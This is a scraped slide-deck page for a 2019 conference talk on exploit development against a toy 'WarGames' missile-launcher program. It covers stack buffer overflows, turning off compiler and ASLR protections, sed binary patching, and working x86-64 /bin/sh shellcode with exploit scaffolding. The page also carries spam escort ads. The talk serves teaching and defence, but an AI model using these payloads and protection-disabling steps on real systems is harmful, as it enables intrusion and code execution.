From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 

Recently uploaded (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 

The Anatomy of an Exploit (NDC TechTown 2019))

  • 2. The Anatomy of an Exploit NDC TechTown 2019 Patricia Aas Turtle Sec @pati_gallardo
  • 3. Patricia Aas - Trainer & Consultant Turtle Sec C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/her @pati_gallardo
  • 5. The Target The Exploit @pati_gallardo @halvarflake5 Weird State Weird State Programming the Weird Machine Vulnerability @sergeybratus
  • 6. The Data is the Program and the Program is the Data Memory Loaders Heap Linkers Stack Memory Allocator @pati_gallardo 6
  • 7. Exploit Development is Programming the Weird Machine 7 @pati_gallardo
  • 10. 10 launch.c @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); gets(response); if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } @olvemaudal
  • 11. 11 $ hello$ clang -o launch launch.c launch.c:19:3: warning: implicit declaration of function 'gets' is invalid in C99 [-Wimplicit-function-declaration] gets(response); ^ 1 warning generated. /tmp/launch-0d1b0f.o: In function `authenticate_and_launch': launch.c:(.text+0x5e): warning: the `gets' function is dangerous and should not be used. CWE-242: Use of Inherently Dangerous Function @pati_gallardo
  • 12. 12 $ hello CMakeLists.txt # Wargames C # ------------------------- add_executable(launch src/launch.c) # Get gets set_property(TARGET launch PROPERTY C_STANDARD 99) # Allow gets target_compile_options(launch PRIVATE -Wno-deprecated-declarations) CMake: Getting gets @pati_gallardo
  • 13. 13 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: David Access denied Operation complete $ ./launch WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 2 missiles Operation complete Happy Day Scenario @pati_gallardo
  • 14. 14 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar *** buffer overflow detected ***: ./launch terminated Aborted (core dumped) Unhappy Day Scenario @pati_gallardo Unstable Weird State
  • 16. 16 $ hello CMakeLists.txt # Remove Fortify protection in libc # *** buffer overflow detected ***: ./launch terminated # Aborted (core dumped) target_compile_options(launch PRIVATE -D_FORTIFY_SOURCE=0) CMake : Remove fortify protection from libc @pati_gallardo
  • 17. 17 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied *** stack smashing detected ***: <unknown> terminated Aborted (core dumped) CMake : Remove fortify protection from libc @pati_gallardo
  • 19. Stack Canary 100 Return address 99 Stack Canary 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 19 @pati_gallardo
  • 20. 20 $ hello CMakeLists.txt # remove the stack protector # *** stack smashing detected ***: <unknown> terminated # Aborted (core dumped) target_compile_options(launch PRIVATE -fno-stack-protector) CMake: Turn off stack protector @pati_gallardo
  • 21. 21 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied Segmentation fault (core dumped) CMake: Turn off stack protector What’s going on? Let’s check on godbolt @pati_gallardo
  • 22. Debug: Local variables on the stack Release: Local variables optimized out @pati_gallardo
  • 23. Let’s try the Debug build then! @pati_gallardo
  • 24. 24 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 1869443685 missiles Access denied Operation complete Debug Build Somebody’s bools are acting weird :D ✔ @pati_gallardo
  • 25. Prefer C++ to C, right? @pati_gallardo
  • 26. 26 $ hello CMakeLists.txt # Wargames C++ # ------------------------- add_executable(launch_cpp src/launch.cpp) Start from scratch with C++ @pati_gallardo
  • 27. 27 launch.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch() { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main() { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Much better, right?
  • 28. 28 $ hello$ clang++ -o launch_cpp launch.cpp $ Not even a warning! @pati_gallardo Must be better, right?
  • 29. 29 $ hello$ ./launch_cpp WarGames MissileLauncher v0.1 Secret: David Access denied Operation complete $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 2 missiles Operation complete Happy Day Scenario @pati_gallardo
  • 30. 30 $ hello$ clang++ -O3 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied Operation complete Segmentation fault (core dumped) Let’s test the release build @pati_gallardo
  • 31. 31 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 1852796274 missiles Segmentation fault (core dumped) Ok, debug then... Both n_missiles and allowaccess overwritten ✔ @pati_gallardo Ops...
  • 33. int n_missiles = 2; bool allowaccess = false; @pati_gallardo 33
  • 34. 34 launch.cpp @pati_gallardovoid authenticate_and_launch() { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); }
  • 35. 35 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBBC* Access granted Launching 42 missiles Operation complete $ Lets try a shorter string n_missiles -> 42 -> 0x2a -> ‘*’ ✔ @pati_gallardo
  • 36. 36 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBBCd Access granted Launching 100 missiles Operation complete Lets try a shorter string n_missiles -> 100 -> 0x64 -> ‘d’ ✔ @pati_gallardo
  • 37. 37 $ hello$ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBB0d Access denied Operation complete $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBB1d Access granted Launching 100 missiles Operation complete Controlling allowaccess Controlling allowaccess ✔ @pati_gallardo
  • 39. @pati_gallardo 39 $ hello simple_exploit.c int main(void) { struct { uint8_t buffer[8]; bool allowaccess; char n_missiles; } sf; memset(&sf, 0, sizeof sf); sf.allowaccess = true; sf.n_missiles = 42; fwrite(&sf, sizeof sf, 1, stdout); } Automate the string @pati_gallardo @olvemaudal
  • 40. 40 $ hello$ clang -o simple_exploit simple_exploit.c $ ./simple_exploit | ./launch WarGames MissileLauncher v0.1 Secret: Access granted Launching 42 missiles Operation complete $ ./simple_exploit | ./launch_cpp WarGames MissileLauncher v0.1 Secret: Access granted Launching 42 missiles Operation complete Let’s try it out! ✔ ✔ @pati_gallardo
  • 41. Fixing the C++ code! @pati_gallardo
  • 42. 42 launch.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); size_t max = sizeof response; std::cin >> std::setw(max) >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Set the width on cin
  • 43. 43 $ hello$ clang++ -o launch_fixed launch_fixed.cpp $ ./launch_fixed WarGames MissileLauncher v0.1 Secret: AAAABBBBC* Access denied Operation complete $ ./simple_exploit | ./launch_fixed WarGames MissileLauncher v0.1 Secret: Access denied Operation complete Let’s test it! @pati_gallardo
  • 44. Use sed to binary patch @pati_gallardo
  • 45. 45 $ hello $ objdump -M intel -d ./launch | grep -A 7 "<_Z23authenticate_and_launchv>:" 0000000000400890 <_Z23authenticate_and_launchv>: 400890: 55 push rbp 400891: 48 89 e5 mov rbp,rsp 400894: 48 83 ec 30 sub rsp,0x30 400898: 48 bf 4b 0a 40 00 00 movabs rdi,0x400a4b 40089f: 00 00 00 4008a2: c7 45 fc 02 00 00 00 mov DWORD PTR [rbp-0x4],0x2 4008a9: c6 45 fb 00 mov BYTE PTR [rbp-0x5],0x0 Use sed to binary patch $ cp launch launch_mod $ sed -i "s/xc7x45xfcx02/xc7x45xfcx2a/" ./launch_mod $ sed -i "s/xc6x45xfbx00/xc6x45xfbx01/" ./launch_mod @pati_gallardo n_missiles = 2 allowaccess = false n_missiles = 42 and allowaccess = true
  • 46. 46 $ hello $ ./launch_mod WarGames MissileLauncher v0.1 Secret: David Access granted Launching 42 missiles Operation complete Use sed to binary patch ✔$ ./launch_mod WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 42 missiles Operation complete $ ./launch_mod WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 42 missiles Operation complete ✔ ✔ @pati_gallardo
  • 48. Shellcode - code that gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode 48 @pati_gallardo
  • 49. Write direction vs Stack growing direction 100 Return address 99 <something> 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 49 @pati_gallardo
  • 50. Stack grows toward lower addresses Writes go toward higher addresses ptr++ 50 Write direction vs Stack growing direction @pati_gallardo 100 char[5]: “ret” address 95 99 char[4]: No-op 98 char[3]: No-op 97 char[2]: No-op 96 char[1]: Shellcode 95 char[0]: Shellcode Write Payload
  • 51. 100 char[5]: “ret” address 95 99 char[4]: No-op 98 char[3]: No-op 97 char[2]: No-op 96 char[1]: Shellcode 95 char[0]: Shellcode Stack grows toward lower addresses Instructions also go toward higher addresses 51 Write direction vs Stack growing direction @pati_gallardo
  • 52. 52 stack_overflow_exploit.c @pati_gallardoint main(void) { char shellcode[] = ""; size_t shellcode_size = (sizeof shellcode) - 1; int offset = 0; // We need to find the return addr offset int padded_bytes = offset - shellcode_size; { fwrite(shellcode, 1, shellcode_size, stdout); } { char pad[] = "x90"; // No-ops for (int i = 0; i < padded_bytes; i++) fwrite(pad, 1, 1, stdout); } { // We need to find the address of the buffer char addr[] = ""; fwrite(addr, 1, 6, stdout); } putchar('0'); } Basic structure of the exploit code
  • 53. 53 stack_overflow_exploit.c @pati_gallardoint main(void) { char shellcode[] = ""; size_t shellcode_size = (sizeof shellcode) - 1; int offset = 0; // We need to find the return addr offset int padded_bytes = offset - shellcode_size; { fwrite(shellcode, 1, shellcode_size, stdout); } { char pad[] = "x90"; // No-ops for (int i = 0; i < padded_bytes; i++) fwrite(pad, 1, 1, stdout); } { // We need to find the address of the buffer char addr[] = ""; fwrite(addr, 1, 6, stdout); } putchar('0'); } What we need to know Offset of return address from buffer on the stack Address of buffer in memory
  • 54. 54 launch_bigger.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[110]; printf("%pn", &response); printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Lets make some changes to make it easier Bigger buffer and get the address
  • 55. ASLR echo 0 > /proc/sys/kernel/randomize_va_space @pati_gallardo 55
  • 56. Metasploit pattern_create and pattern_offset Used to find the offset of the return pointer from the start of the buffer Metasploit pattern_create Creates a string of un-repeated character sequences Metasploit pattern_offset Gives the offset in the character sequence of this section @pati_gallardo 56
  • 57. 57 @pati_gallardo$ pattern_create -l 150 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac 1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A e3Ae4Ae5Ae6Ae7Ae8Ae9 $ clang++ -z execstack -fno-stack-protector -o launch_bigger launch_bigger.cpp $ gdb -q ./launch_bigger (gdb) br *authenticate_and_launch+205 Breakpoint 1 at 0x4008dd (gdb) r Starting program: ./launch_bigger WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac 1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A e3Ae4Ae5Ae6Ae7Ae8Ae9 Access granted Launching 1698771301 missiles Breakpoint 1, 0x00000000004008dd in authenticate_and_launch() () (gdb) x/1xg $sp 0x7fffffffdd18: 0x3765413665413565 (gdb) q $ pattern_offset -q 3765413665413565 [*] Exact match at offset 136 Find the offset of the return address Offset of return address from buffer on the stack Address of buffer in memory
  • 59. 59 simple_stack_overflow_test.c @pati_gallardo#include <stdio.h> #include <string.h> char shellcode[] = "xebx17" // jmp <push_str> "x5f" // <pop_str>: pop %rdi "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x48x89xe6" // mov %rsp,%rsi "x48x89x54x24x08" // mov %rdx,0x8(%rsp) "x48x89x3cx24" // mov %rdi,(%rsp) "xb0x3b" // mov $0x3b,%al "x0fx05" // syscall "xe8xe4xffxffxff" // <push_str>: callq <pop_str> "/bin/sh"; int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } See talk at CppCon 2018 for details
  • 60. 60 $ hellowargames$ clang -z execstack -o simple_stack_overflow_test simple_stack_overflow_test.c wargames$ ./simple_stack_overflow_test len:37 bytes $ Let’s just test it @pati_gallardo ✔
  • 61. 61 $ hellowargames$ clang -o simple_stack_overflow_exploit simple_stack_overflow_exploit.c wargames$ ./simple_stack_overflow_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied Let’s try it @pati_gallardo It just hangs: /bin/sh string not null terminated
  • 63. 63 $ hello simple_stack_overflow_test2.c char shellcode[] = "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx62x69x6ex2fx2fx73x68" // movabs $0x68732f2f6e69622f,%rbx "x53" // push %rbx "x48x89xe7" // mov %rsp,%rdi "x52" // push %rdx "x57" // push %rdi "x48x89xe6" // mov %rsp,%rsi "xb0x3b" // mov $0x3b,%al "x0fx05"; // syscall int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } @pati_gallardo Null terminate the string in the shellcode Hex value Ascii Reverse Ascii 68732f2f6e69622f hs//nib/ /bin//sh
  • 64. 64 $ hellowargames$ clang -z execstack -fno-stack-protector -o simple_stack_overflow_test2 simple_stack_overflow_test2.c wargames$ ./simple_stack_overflow_test2 len:30 bytes $ Let’s just test it @pati_gallardo ✔
  • 65. 65 $ hellowargames$ clang -o simple_stack_overflow_exploit simple_stack_overflow_exploit.c wargames$ ./simple_stack_overflow_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied process 21397 is executing new program: /bin/dash [Inferior 1 (process 21397) exited normally] (gdb) Let’s try it @pati_gallardo Starts /bin/bash but exits immediately ✔
  • 66. 66 $ hellowargames$ clang -o simple_stack_overflow_exploit2 simple_stack_overflow_exploit2.c wargames$ ./simple_stack_overflow_exploit2 > file wargames$ strace -o strace.log ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdd10 Secret: Access denied wargames$ grep ENOTTY strace.log ioctl(0, TCGETS, 0x7fffffffeba0) = -1 ENOTTY (Inappropriate ioctl for device) What’s wrong? Lets look at strace @pati_gallardo The shell fails to start because of TTY? Google!
  • 68. New Idea! Try to close STDIN and reopen tty first @pati_gallardo 68
  • 69. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 69 @pati_gallardo
  • 70. 70 $ hello shellcode.c #include <unistd.h> #include <fcntl.h> int main(void) { close(0); open("/dev/tty", O_RDWR); char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo
  • 71. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 71 @pati_gallardo
  • 72. 72 $ hellowargames$ clang -save-temps -Os -static -fno-stack-protector -o shellcode shellcode.c wargames$ ./shellcode $ wargames$ ldd shellcode not a dynamic executable Build it statically, with no canary @pati_gallardo
  • 73. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 73 @pati_gallardo
  • 74. 74 $ hellowargames$ objdump -d shellcode | grep -A 14 "<main>" 0000000000400b30 <main>: 400b30: 48 83 ec 18 sub $0x18,%rsp 400b34: 31 ff xor %edi,%edi 400b36: e8 15 8b 04 00 callq 449650 <__close> 400b3b: bf 44 1f 49 00 mov $0x491f44,%edi 400b40: be 02 00 00 00 mov $0x2,%esi 400b45: 31 c0 xor %eax,%eax 400b47: e8 a4 85 04 00 callq 4490f0 <__libc_open> 400b4c: b8 4d 1f 49 00 mov $0x491f4d,%eax 400b51: 66 48 0f 6e c0 movq %rax,%xmm0 400b56: 48 89 e6 mov %rsp,%rsi 400b59: 66 0f 7f 06 movdqa %xmm0,(%rsi) 400b5d: bf 4d 1f 49 00 mov $0x491f4d,%edi 400b62: 31 d2 xor %edx,%edx 400b64: e8 47 7f 04 00 callq 448ab0 <__execve> Look at the assembly of main @pati_gallardo
  • 75. 75 %rax # System call %rdi %rsi %rdx %r10 0x3 3 sys_close unsigned int fd 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] 0x101 257 sys_openat int dfd const char * filename int flags int mode The syscalls involved @pati_gallardo
  • 76. 76 $ hellowargames$ objdump -d shellcode | grep -A 6 "<__close>:" 0000000000449650 <__close>: 449650: 8b 05 b6 31 27 00 mov 0x2731b6(%rip),%eax 449656: 85 c0 test %eax,%eax 449658: 75 16 jne 449670 <__close+0x20> 44965a: b8 03 00 00 00 mov $0x3,%eax 44965f: 0f 05 syscall 449661: 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax %rax # System call %rdi 0x3 3 sys_close unsigned int fd @pati_gallardo
  • 77. 77 $ hello shellcode_asm.c // -------------------------------------------------------- // close // -------------------------------------------------------- "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %rax, %raxnt" // Zero out rax - without using 0 "mov $0x3, %alnt" // Write the syscall number (3) to al "syscallnt" // Do the syscall %rax # System call %rdi 0x3 3 sys_close unsigned int fd @pati_gallardo
  • 78. 78 $ hello wargames$ objdump -d shellcode | grep -A 30 "<__libc_open>:" 00000000004490f0 <__libc_open>: 4490f0: 48 83 ec 68 sub $0x68,%rsp 4490f4: 41 89 f2 mov %esi,%r10d 4490f7: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 4490fe: 00 00 449100: 48 89 44 24 28 mov %rax,0x28(%rsp) 449105: 31 c0 xor %eax,%eax 449107: 41 83 e2 40 and $0x40,%r10d 44910b: 48 89 54 24 40 mov %rdx,0x40(%rsp) 449110: 75 4e jne 449160 <__libc_open+0x70> 449112: 89 f0 mov %esi,%eax 449114: 25 00 00 41 00 and $0x410000,%eax 449119: 3d 00 00 41 00 cmp $0x410000,%eax 44911e: 74 40 je 449160 <__libc_open+0x70> 449120: 8b 05 e6 36 27 00 mov 0x2736e6(%rip),%eax 449126: 85 c0 test %eax,%eax 449128: 75 61 jne 44918b <__libc_open+0x9b> 44912a: 89 f2 mov %esi,%edx 44912c: b8 01 01 00 00 mov $0x101,%eax 449131: 48 89 fe mov %rdi,%rsi 449134: bf 9c ff ff ff mov $0xffffff9c,%edi 449139: 0f 05 syscall %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo
  • 79. 79 $ hello shellcode_asm.c // -------------------------------------------------------- // open // -------------------------------------------------------- "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx: // /dev/tty = 2f 64 65 76 2f 74 74 79 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rsint" // Put a pointer to the string in rsi "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %r10, %r10nt" // Zero out r10 - without using 0 "mov $0x101, %eaxnt" // Write the syscall number (257) "syscallnt" // Do the syscall %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo
  • 80. 80 $ hellowargames$ objdump -d shellcode | grep -A 3 "<__execve>:" 0000000000448ab0 <__execve>: 448ab0: b8 3b 00 00 00 mov $0x3b,%eax 448ab5: 0f 05 syscall 448ab7: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax %rax # System call %rdi %rsi %rdx 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] @pati_gallardo
  • 81. 81 $ hello shellcode_asm.c // -------------------------------------------------------- // execve // -------------------------------------------------------- "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x68732f2f6e69622f, %rbxnt" // Put the string in rbx: // /bin//sh = 2f 62 69 6e 2f 2f 73 68 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rdint" // Put a pointer to the string in rdi "push %rdxnt" // Push a null to terminate the array "push %rdint" // Push the pointer to the string "mov %rsp, %rsint" // Put a pointer to argv in rsi "mov $0x3b, %alnt" // Write the syscall number 59 to al "syscallnt" // Do the syscall %rax # System call %rdi %rsi %rdx 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] @pati_gallardo
  • 82. 82 $ hellowargames$ clang -o shellcode_asm shellcode_asm.c wargames$ ./shellcode_asm $ Compile and test the assembly @pati_gallardo ✔
  • 83. 83 @pati_gallardowargames$ objdump -d shellcode_asm | grep -A 29 "<main>" 400480: 55 push %rbp 400481: 48 89 e5 mov %rsp,%rbp 400484: 48 31 ff xor %rdi,%rdi 400487: 48 31 c0 xor %rax,%rax 40048a: b0 03 mov $0x3,%al 40048c: 0f 05 syscall 40048e: 48 31 c0 xor %rax,%rax 400491: 50 push %rax 400492: 48 bb 2f 64 65 76 2f movabs $0x7974742f7665642f,%rbx 400499: 74 74 79 40049c: 53 push %rbx 40049d: 48 89 e6 mov %rsp,%rsi 4004a0: 48 31 d2 xor %rdx,%rdx 4004a3: 48 31 ff xor %rdi,%rdi 4004a6: 4d 31 d2 xor %r10,%r10 4004a9: b8 01 01 00 00 mov $0x101,%eax 4004ae: 0f 05 syscall 4004b0: 48 31 d2 xor %rdx,%rdx 4004b3: 48 31 c0 xor %rax,%rax 4004b6: 50 push %rax 4004b7: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4004be: 2f 73 68 4004c1: 53 push %rbx 4004c2: 48 89 e7 mov %rsp,%rdi 4004c5: 52 push %rdx 4004c6: 57 push %rdi 4004c7: 48 89 e6 mov %rsp,%rsi 4004ca: b0 3b mov $0x3b,%al 4004cc: 0f 05 syscall Look at the assembly of main Null bytes in the shellcode!
